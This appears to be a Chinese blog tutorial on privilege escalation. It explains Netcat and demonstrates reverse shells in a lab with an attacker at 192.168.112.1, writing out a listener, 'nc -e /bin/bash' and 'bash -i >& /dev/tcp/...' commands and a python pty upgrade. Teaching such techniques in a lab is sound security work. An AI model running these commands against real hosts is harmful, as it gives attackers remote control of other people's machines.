当前位置: 首页 > article >正文

提权(2), Netcat反弹shell

一, 简介

Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.

它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作

Netcat在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y

二, 反弹shell实验

环境:

攻击端: 192.168.112.1, kali
目标端: 192.168.112.202

由攻击者监听, 从目标端反弹shell给攻击端.

nc反弹shell

攻击端监听 5555 端口:

nc -lvp 5555

目标端反弹shell:

方式1:

这行命令的作用是使用 Netcat(nc)工具在指定的 IP 地址和端口号上创建一个反向 shell。
具体来说,它将标准输入和标准输出重定向到指定的 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 由nc执行bash, 回显给攻击端, 攻击端不显示提示符.

nc -e /bin/bash 192.168.112.1 5555

如果要显示带提示符的交互式终端, 可以继续使用python创建虚拟终端:

python -c 'import pty;pty.spawn("/bin/bash")'
方式2:

这行命令是一个反向 shell 的命令,它将一个 bash shell 连接到指定的 IP 地址和端口号上。
具体来说,它将标准输入和标准输出重定向到一个 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 这种方式执行后, 攻击端会显示提示符.

bash -i >& /dev/tcp/192.168.112.1/5555 0>&1
其他方式

还可以使用 telnet, awk, python, php, java等都可以反弹shell.
加密的反弹shell可以使用openssl和mkfifo加密通道.


http://www.kler.cn/a/155536.html

相关文章:

  • jwt用户登录,网关给微服务传递用户信息,以及微服务间feign调用传递用户信息
  • Elasticsearch(ES)简介
  • Qwen2 系列大型语言模型
  • 河南省的一级科技查新机构有哪些?
  • linux安装netstat命令
  • 【ARM Coresight OpenOCD 系列 5 -- arp_examine 使用介绍】
  • html页面多个视频标签时设定只能播放一个视频
  • 视频智能分析国标GB28181云平台EasyCVR加密机授权异常是什么原因?
  • Java数据结构 之 包装类简单认识泛类
  • 操作系统进程与线程篇
  • 【Unity动画】什么是动画蒙版(Avatar Mask)
  • 【面试经典 150 | 二分查找】搜索插入位置
  • 【STL】手撕 string类
  • Python练习题(二)
  • re:Invent 构建未来:云计算生成式 AI 诞生科技新局面
  • IO_D3(231205)
  • Python datetime 字符串 相互转 datetime
  • C#网络编程System.Net.WebClient 类vs System.Net.Http.HttpClient 类
  • windows下docker环境搭建与运行实战
  • UCore-OS实验Lab0
  • 说一说MySQL中的锁机制
  • 通过Python Flask快速构建应用程序
  • 计算机视觉各个方向概述
  • JavaWeb 带条件的分页查询
  • 视图层与模板层
  • React如何像Vue一样将css和js写在同一文件